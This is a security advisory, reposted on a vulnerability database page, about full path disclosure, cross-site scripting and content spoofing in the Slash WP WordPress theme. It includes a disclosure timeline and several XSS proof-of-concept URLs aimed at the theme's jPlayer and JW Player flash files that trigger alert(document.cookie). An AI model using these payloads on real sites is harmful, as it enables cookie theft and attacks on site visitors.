Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Slash Theme XSS / Spoofing / Disclosure

🗓️ 21 Jun 2013 00:00:00Reported by MustLiveType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 43 Views

Warning: WordPress Slash WP theme has Full Path Disclosure, Cross-Site Scripting, and Content Spoofing vulnerabilitie

Code
`Hello list!  
  
I want to warn you about multiple vulnerabilities in Slash WP theme for   
WordPress. This is commercial theme for WP.  
  
These are Full path disclosure, Cross-Site Scripting and Content Spoofing   
vulnerabilities.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are all versions of Slash WP theme for WordPress. After I've   
informed developers about these vulnerabilities in April, they just thanked   
and promised to look at these vulnerabilities. There are no information if   
they fixed these holes already or when they are planning to do it. So all   
users of the theme should contact the developers for updates.  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Dream-Theme  
http://dream-theme.com  
  
----------  
Details:  
----------  
  
Full path disclosure (WASC-13):  
  
http://site/wp-content/themes/slash-wp/  
  
FPD in index.php and other php-files in plugin's folder and subfolders.  
  
Cross-Site Scripting (WASC-08):  
  
In the theme there are jPlayer 2.1.0 and JW Player 5.8.2011, about   
vulnerabilities in which I wrote earlier (in 2012 and 2013).  
  
http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//  
  
http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//  
  
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?playerready=alert(document.cookie)  
  
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg  
  
There is flash file of JW Player at some sites with this theme, but not at   
others. According to theme's description, theme has built-in support of JW   
Player, but it's not included in standard bundle (only jPlayer). But it can   
be installed separately and some web sites owners do it.  
  
Content Spoofing (WASC-12):  
  
About Content Spoofing vulnerabilities and about other XSS vulnerabilities   
in JW Player (http://securityvulns.com/docs28176.html) and in jPlayer   
(http://securityvulns.com/docs29316.html), you can read in corresponding   
advisories.  
  
------------  
Timeline:  
------------   
  
2013.04.11 - announced at my site.  
2013.04.12 - informed developers.  
2013.06.20 - disclosed at my site (http://websecurity.com.ua/6440/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jun 2013 00:00Current
wordpressslash wp themefull path disclosurecross-site scriptingcontent spoofingvulnerabilitiesdream-themejplayerjw player
43